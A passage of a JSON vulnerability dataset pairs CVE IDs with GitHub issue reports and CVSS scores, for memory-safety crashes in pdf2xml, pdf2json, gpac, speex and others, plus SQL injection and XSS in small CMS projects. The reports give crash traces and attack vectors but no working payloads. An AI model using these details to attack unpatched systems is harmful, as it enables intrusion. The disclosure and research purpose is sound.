NUMBERTAG e2c2 APITAG NUMBERTAG lea NUMBERTAG r9),%r NUMBERTAG e2c9 APITAG NUMBERTAG mov %r NUMBERTAG rb NUMBERTAG e2d0 APITAG NUMBERTAG add NUMBERTAG fc,%r9 (gdb) p/x $rc NUMBERTAG ref: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23873",
        "Issue_Url_old": "https://github.com/kermitt2/pdf2xml/issues/11",
        "Issue_Url_new": "https://github.com/kermitt2/pdf2xml/issues/11",
        "Repo_new": "kermitt2/pdf2xml",
        "Issue_Created_At": "2020-07-06T01:58:25Z",
        "description": "Heap buffer overflow APITAG dump. $ ./pdf2xml FILETAG test.xml APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG a at pc NUMBERTAG fb7e NUMBERTAG d9f5 bp NUMBERTAG ffc8a9d8c NUMBERTAG sp NUMBERTAG ffc8a9d NUMBERTAG f0 WRITE of size NUMBERTAG at NUMBERTAG a thread T NUMBERTAG fb7e NUMBERTAG d9f4 in __interceptor_vsprintf ( PATHTAG NUMBERTAG fb7e NUMBERTAG dcc9 in __interceptor_sprintf ( PATHTAG NUMBERTAG e NUMBERTAG in APITAG int) PATHTAG NUMBERTAG ec5 in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG a in APITAG , double, double, int, int, int, int, int, int, int, int, int ( )(void ), void ) PATHTAG NUMBERTAG e in APITAG , double, double, int, int, int, int, int ( )(void ), void ) PATHTAG NUMBERTAG d in APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) PATHTAG NUMBERTAG de8 in APITAG , APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) PATHTAG NUMBERTAG b in main PATHTAG NUMBERTAG fb7e NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG d NUMBERTAG in _start ( PATHTAG NUMBERTAG a is located NUMBERTAG bytes to the right of NUMBERTAG byte region FILETAG ref: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23874",
        "Issue_Url_old": "https://github.com/kermitt2/pdf2xml/issues/12",
        "Issue_Url_new": "https://github.com/kermitt2/pdf2xml/issues/12",
        "Repo_new": "kermitt2/pdf2xml",
        "Issue_Created_At": "2020-07-06T02:02:32Z",
        "description": "Heap buffer overflow APITAG $ ./pdf2xml FILETAG FILETAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG a at pc NUMBERTAG f NUMBERTAG e NUMBERTAG f5 bp NUMBERTAG fffaa6b NUMBERTAG sp NUMBERTAG fffaa6b2da0 WRITE of size NUMBERTAG at NUMBERTAG a thread T NUMBERTAG f NUMBERTAG e NUMBERTAG f4 in __interceptor_vsprintf ( PATHTAG NUMBERTAG f NUMBERTAG e NUMBERTAG cc9 in __interceptor_sprintf ( PATHTAG NUMBERTAG e3d in APITAG , APITAG , double&, double&, double&, double&, double&, double&) PATHTAG NUMBERTAG c7c in APITAG int) PATHTAG NUMBERTAG ec5 in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG a in APITAG , double, double, int, int, int, int, int, int, int, int, int ( )(void ), void ) PATHTAG NUMBERTAG e in APITAG , double, double, int, int, int, int, int ( )(void ), void ) PATHTAG NUMBERTAG d in APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) PATHTAG NUMBERTAG de8 in APITAG , APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) PATHTAG NUMBERTAG b in main PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG d NUMBERTAG in _start ( PATHTAG NUMBERTAG a is located NUMBERTAG bytes to the right of NUMBERTAG byte region FILETAG ref: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23876",
        "Issue_Url_old": "https://github.com/kermitt2/pdf2xml/issues/14",
        "Issue_Url_new": "https://github.com/kermitt2/pdf2xml/issues/14",
        "Repo_new": "kermitt2/pdf2xml",
        "Issue_Created_At": "2020-07-06T03:02:05Z",
        "description": "Memory leaks APITAG APITAG $ ./pdf2xml NUMBERTAG Memory FILETAG test.xml APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG f NUMBERTAG d2f NUMBERTAG PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG a9 in APITAG , double, double, double, double) PATHTAG NUMBERTAG d in APITAG int) PATHTAG NUMBERTAG ec5 in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG e in APITAG , double, double, int, int, int, int, int ( )(void ), void ) PATHTAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG a6c in APITAG int) PATHTAG NUMBERTAG ec5 in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG e in APITAG , double, double, int, int, int, int, int ( )(void ), void ) PATHTAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG e NUMBERTAG f in strdup ( PATHTAG NUMBERTAG a NUMBERTAG in APITAG , int, int, int, int, double, double, int, APITAG , double, int, int) PATHTAG NUMBERTAG fc in APITAG , double, double) PATHTAG NUMBERTAG c9 in APITAG , double, double, double, double, unsigned int, int, unsigned int , int) PATHTAG NUMBERTAG in APITAG , double, double, double, double, double, double, unsigned int, int, unsigned int , int) PATHTAG NUMBERTAG b1 in APITAG ) PATHTAG ref: URLTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23877",
        "Issue_Url_old": "https://github.com/kermitt2/pdf2xml/issues/15",
        "Issue_Url_new": "https://github.com/kermitt2/pdf2xml/issues/15",
        "Repo_new": "kermitt2/pdf2xml",
        "Issue_Created_At": "2020-07-06T03:05:26Z",
        "description": "Stack buffer overflow APITAG APITAG $ gdb ./pdf2xml (gdb) r FILETAG test.xml FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23878",
        "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/45",
        "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/45",
        "Repo_new": "flexpaper/pdf2json",
        "Issue_Created_At": "2020-07-09T09:56:14Z",
        "description": "Stack buffer overflow APITAG fetch. $ ./pdf2json FILETAG ASAN:SIGSEGV APITAG NUMBERTAG ERROR: APITAG stack overflow on address NUMBERTAG ffc9d6bcfe0 (pc NUMBERTAG f2cf5cba NUMBERTAG e bp NUMBERTAG sp NUMBERTAG ffc9d6bcfd0 T NUMBERTAG f2cf5cba NUMBERTAG d ( PATHTAG NUMBERTAG f2cf5cb9d NUMBERTAG PATHTAG NUMBERTAG f2cf5c2cf4f ( PATHTAG NUMBERTAG f2cf5ca NUMBERTAG fe in operator new(unsigned long) ( PATHTAG NUMBERTAG c4 in APITAG int, Object ) PATHTAG NUMBERTAG in APITAG , int) PATHTAG NUMBERTAG d6 in APITAG int, Object ) PATHTAG NUMBERTAG in APITAG , int) PATHTAG NUMBERTAG d6 in APITAG int, Object ) PATHTAG NUMBERTAG in APITAG , int) PATHTAG NUMBERTAG d6 in APITAG int, Object ) PATHTAG NUMBERTAG in APITAG , int) PATHTAG ref: URLTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23879",
        "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/44",
        "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/44",
        "Repo_new": "flexpaper/pdf2json",
        "Issue_Created_At": "2020-07-09T09:51:29Z",
        "description": "NULL pointer dereference APITAG APITAG $ ./pdf2json FILETAG Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object ASAN:SIGSEGV APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG f NUMBERTAG bp NUMBERTAG ffe1f9cf NUMBERTAG sp NUMBERTAG ffe1f9cf5b8 T NUMBERTAG f5f in APITAG int, Object ) PATHTAG NUMBERTAG ec in APITAG int, Object ) PATHTAG NUMBERTAG in APITAG , Object ) PATHTAG NUMBERTAG in APITAG ) PATHTAG NUMBERTAG fe0 in APITAG , APITAG ) PATHTAG NUMBERTAG b in APITAG , APITAG , APITAG , void ) PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG fd2eaec NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG APITAG int, Object NUMBERTAG ABORTING ref: URLTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23884",
        "Issue_Url_old": "https://github.com/nomacs/nomacs/issues/516",
        "Issue_Url_new": "https://github.com/nomacs/nomacs/issues/516",
        "Repo_new": "nomacs/nomacs",
        "Issue_Created_At": "2020-07-09T11:28:59Z",
        "description": "Open a malformed mng format file, buffer overflow and memory corruption will occur.. Two issues were found in nomacs in all versions. nomacs does not handle the mng file format very well. When nomacs opens a carefully constructed mng file, nomacs will have a buffer overflow and crash NUMBERTAG buffer overflow APITAG APITAG Access violation code c NUMBERTAG first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. ea NUMBERTAG eb NUMBERTAG ec NUMBERTAG ffffc NUMBERTAG ed NUMBERTAG d NUMBERTAG esi NUMBERTAG fd NUMBERTAG edi NUMBERTAG d NUMBERTAG eip NUMBERTAG edc NUMBERTAG b esp NUMBERTAG a7f NUMBERTAG ebp NUMBERTAG iopl NUMBERTAG nv up ei pl nz na pe nc cs NUMBERTAG b ss NUMBERTAG ds NUMBERTAG es NUMBERTAG fs NUMBERTAG b gs NUMBERTAG efl NUMBERTAG ERROR: Symbol file could not be found. Defaulted to export symbols for PATHTAG qmng NUMBERTAG b NUMBERTAG edc NUMBERTAG b f3ab rep stos dword ptr es:[edi NUMBERTAG exploitable v !exploitable NUMBERTAG APITAG Executing Processor Architecture is NUMBERTAG Debuggee is in User Mode Debuggee is a live user mode debugging session on the local machine Event Type: Exception Exception Faulting Address NUMBERTAG d NUMBERTAG First Chance Exception Type: STATUS_ACCESS_VIOLATION APITAG Exception Sub Type: Write Access Violation Faulting Instruction NUMBERTAG edc NUMBERTAG b rep stos dword ptr es:[edi] Exception Hash APITAG APITAG Hash Usage : Stack Trace: APITAG : qmng NUMBERTAG b Instruction Address NUMBERTAG edc NUMBERTAG b Description: User Mode Write AV Short Description: APITAG Exploitability Classification: EXPLOITABLE Recommended Bug Title: Exploitable User Mode Write AV starting at qmng NUMBERTAG b APITAG User mode write access violations that are not near NULL are exploitable. APITAG NUMBERTAG memory corruption APITAG Access violation code c NUMBERTAG first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. ea NUMBERTAG e8e1 eb NUMBERTAG ec NUMBERTAG ed NUMBERTAG esi NUMBERTAG edi NUMBERTAG eip NUMBERTAG edbd NUMBERTAG esp NUMBERTAG aef3c4 ebp NUMBERTAG a NUMBERTAG iopl NUMBERTAG nv up ei ng nz na po cy cs NUMBERTAG b ss NUMBERTAG ds NUMBERTAG es NUMBERTAG fs NUMBERTAG b gs NUMBERTAG efl NUMBERTAG ERROR: Symbol file could not be found. Defaulted to export symbols for PATHTAG qmng NUMBERTAG d NUMBERTAG edbd NUMBERTAG e mov byte ptr [esi],cl ds NUMBERTAG exploitable v !exploitable NUMBERTAG APITAG Executing Processor Architecture is NUMBERTAG Debuggee is in User Mode Debuggee is a live user mode debugging session on the local machine Event Type: Exception Exception Faulting Address NUMBERTAG First Chance Exception Type: STATUS_ACCESS_VIOLATION APITAG Exception Sub Type: Write Access Violation Faulting Instruction NUMBERTAG edbd NUMBERTAG mov byte ptr [esi],cl Basic Block NUMBERTAG edbd NUMBERTAG mov byte ptr [esi],cl Tainted Input operands: 'cl','esi NUMBERTAG edbd NUMBERTAG movzx ecx,byte ptr [ea NUMBERTAG edbd NUMBERTAG a mov byte ptr [esi NUMBERTAG cl NUMBERTAG edbd NUMBERTAG d movzx ecx,byte ptr [ea NUMBERTAG edbd NUMBERTAG mov byte ptr [esi NUMBERTAG cl NUMBERTAG edbd NUMBERTAG movzx ecx,byte ptr [ea NUMBERTAG edbd NUMBERTAG mov byte ptr [esi NUMBERTAG cl NUMBERTAG edbd NUMBERTAG b mov ecx,dword ptr [ebp NUMBERTAG h NUMBERTAG edbd NUMBERTAG add edx,ec NUMBERTAG edbd NUMBERTAG add ea NUMBERTAG edbd NUMBERTAG lea esi,[esi+ec NUMBERTAG edbd NUMBERTAG cmp edx,dword ptr [ebp NUMBERTAG h NUMBERTAG edbd NUMBERTAG f jl qmng NUMBERTAG d NUMBERTAG edbd NUMBERTAG Exception Hash APITAG APITAG Hash Usage : Stack Trace: APITAG : qmng NUMBERTAG d NUMBERTAG APITAG : qmng NUMBERTAG d Instruction Address NUMBERTAG edbd NUMBERTAG Description: User Mode Write AV near NULL Short Description: APITAG Exploitability Classification: UNKNOWN Recommended Bug Title: User Mode Write AV near NULL starting at qmng NUMBERTAG d NUMBERTAG APITAG User mode write access violations that are near NULL are unknown.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-23903",
        "Issue_Url_old": "https://github.com/xiph/speex/issues/13",
        "Issue_Url_new": "https://github.com/xiph/speex/issues/13",
        "Repo_new": "xiph/speex",
        "Issue_Created_At": "2020-07-13T04:52:03Z",
        "description": "speexenc encode wav file dos vulnerability. when speexenc encode wav file , deal with channels NUMBERTAG will generate a Division by zero error which will cause the software crash FILETAG usage : speexenc sample vulnerability function: static int read_samples(FILE fin,int frame_size, int bits, int channels, int lsb, short input, char buff, spx_int NUMBERTAG t size) { unsigned char in[MAX_FRAME_BYTES NUMBERTAG int i; short s; int nb_read; size_t to_read; if (size && size NUMBERTAG return NUMBERTAG to_read = bits NUMBERTAG channels frame_size;",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-23904",
        "Issue_Url_old": "https://github.com/xiph/speex/issues/14",
        "Issue_Url_new": "https://github.com/xiph/speex/issues/14",
        "Repo_new": "xiph/speex",
        "Issue_Created_At": "2020-07-14T03:07:21Z",
        "description": "speexenc stack buffer overflow . I have found a stack buffer overflow vulnerability in speexenc,this may cause a rce by open a crafted wav file FILETAG the vulnerability function: APITAG } else { nb_read = fread(in NUMBERTAG to_read,fin);",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-23907",
        "Issue_Url_old": "https://github.com/avast/retdec/issues/637",
        "Issue_Url_new": "https://github.com/avast/retdec/issues/637",
        "Repo_new": "avast/retdec",
        "Issue_Created_At": "2019-09-04T12:18:20Z",
        "description": "Bug in bin2llvmir Decoder. I try to translate the following PE file: FILETAG But in the decoder phase, the retdec just gets an error and exits: APITAG The problem is in file APITAG , function ERRORTAG , line NUMBERTAG and line NUMBERTAG two portions of code: CODETAG The problem here is, if up equals to APITAG , the APITAG will crash, the possible fix is: CODETAG After this fix, the Decoder works well: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23912",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/540",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/540",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2020-08-01T02:45:57Z",
        "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), mp NUMBERTAG aac (latest master NUMBERTAG b NUMBERTAG URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" DCMAKE_MODULE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG PATHTAG o /dev/null Output APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-23914",
        "Issue_Url_old": "https://github.com/yhirose/cpp-peglib/issues/121",
        "Issue_Url_new": "https://github.com/yhirose/cpp-peglib/issues/121",
        "Repo_new": "yhirose/cpp-peglib",
        "Issue_Created_At": "2020-08-07T10:34:08Z",
        "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), peglint (latest master NUMBERTAG f URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG ast opt APITAG PATHTAG Output Segmentation fault APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-23915",
        "Issue_Url_old": "https://github.com/yhirose/cpp-peglib/issues/122",
        "Issue_Url_new": "https://github.com/yhirose/cpp-peglib/issues/122",
        "Repo_new": "yhirose/cpp-peglib",
        "Issue_Created_At": "2020-08-07T11:41:48Z",
        "description": "A heap overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), peglint (latest master NUMBERTAG f URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG ast opt ./heap overflow resolve_escape_sequence peglib NUMBERTAG PATHTAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-23921",
        "Issue_Url_old": "https://github.com/Samuel-Tyler/fast_ber/issues/30",
        "Issue_Url_new": "https://github.com/samuel-tyler/fast_ber/issues/30",
        "Repo_new": "samuel-tyler/fast_ber",
        "Issue_Created_At": "2020-08-07T12:52:04Z",
        "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc, fast_ber_compiler (latest master NUMBERTAG b5 URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG APITAG /tmp/fastber APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.1,
        "impactScore": 5.2,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-23928",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1568",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1568",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2020-08-07T04:41:36Z",
        "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), APITAG (latest master NUMBERTAG aa NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure static mp4box Command line PATHTAG diso out /dev/null APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.1,
        "impactScore": 5.2,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-23928",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1569",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1569",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2020-08-07T14:53:11Z",
        "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), APITAG (latest master NUMBERTAG aa NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure static mp4box Command line PATHTAG diso out /dev/null APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.1,
        "impactScore": 5.2,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-23930",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1565",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1565",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2020-08-07T02:28:14Z",
        "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), APITAG (latest master NUMBERTAG aa NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure static mp4box Command line PATHTAG dxml NUMBERTAG d diod latm keep utc out /dev/null APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-23931",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1567",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1567",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2020-08-07T04:38:51Z",
        "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), APITAG (latest master NUMBERTAG aa NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure static mp4box Command line PATHTAG diso out /dev/null APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.1,
        "impactScore": 5.2,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-23931",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1564",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1564",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2020-08-07T01:48:18Z",
        "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), APITAG (latest master NUMBERTAG aa NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address ldl\" ./configure static mp4box Command line PATHTAG diso out /dev/null APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.1,
        "impactScore": 5.2,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-23932",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1566",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1566",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2020-08-07T03:10:20Z",
        "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), APITAG (latest master NUMBERTAG aa NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure static mp4box Command line PATHTAG sdp ttxt NUMBERTAG dump chap ogg dump cover drtp bt out /dev/null APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-23945",
        "Issue_Url_old": "https://github.com/VictorAlagwu/CMSsite/issues/14",
        "Issue_Url_new": "https://github.com/victoralagwu/cmssite/issues/14",
        "Repo_new": "victoralagwu/cmssite",
        "Issue_Created_At": "2020-07-07T07:45:05Z",
        "description": "SQL Injection in FILETAG form. Hello, I found that there is a sql injection vulnerability in the cat_id parameter of the FILETAG file on the website. Entering single quotes in this parameter will cause the webpage to burst and the database statement to burst. And this parameter can be used by sqlmap to obtain data information in the database. FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23962",
        "Issue_Url_old": "https://github.com/xwlrbh/Catfish/issues/7",
        "Issue_Url_new": "https://github.com/xwlrbh/catfish/issues/7",
        "Repo_new": "xwlrbh/catfish",
        "Issue_Created_At": "2020-07-08T04:03:53Z",
        "description": "XSS in \"announcement\" plugin. Catfish CMS NUMBERTAG allows XSS via the \"announcement\" plugin, the parameter \"announcement_gonggao\" in url FILETAG set the parameter : announcement_gonggao: \"> APITAG open the index page ,the js is run.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-24000",
        "Issue_Url_old": "https://github.com/eyoucms/eyoucms/issues/13",
        "Issue_Url_new": "https://github.com/weng-xianhu/eyoucms/issues/13",
        "Repo_new": "weng-xianhu/eyoucms",
        "Issue_Created_At": "2020-07-09T16:50:20Z",
        "description": "There is SQL injection in your source code. The vulnerability affects FILETAG , tid URL encoded POST input tid was set to NUMBERTAG Use APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-24025",
        "Issue_Url_old": "https://github.com/sass/node-sass/issues/3067",
        "Issue_Url_new": "https://github.com/sass/node-sass/issues/3067",
        "Repo_new": "sass/node-sass",
        "Issue_Created_At": "2021-02-05T08:32:48Z",
        "description": "Security Vulnerability Issue CVETAG ]. [ URLTAG URLTAG Certificate validation in node sass NUMBERTAG to NUMBERTAG is disabled when requesting binaries even if the user is not specifying an alternative download path. URLTAG URLTAG Version NUMBERTAG was released in October, but through reading the source code of NUMBERTAG we found that this issue is still unresolved. Is there a plan to fix this issue?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-24026",
        "Issue_Url_old": "https://github.com/jianyan74/TinyShop/issues/14",
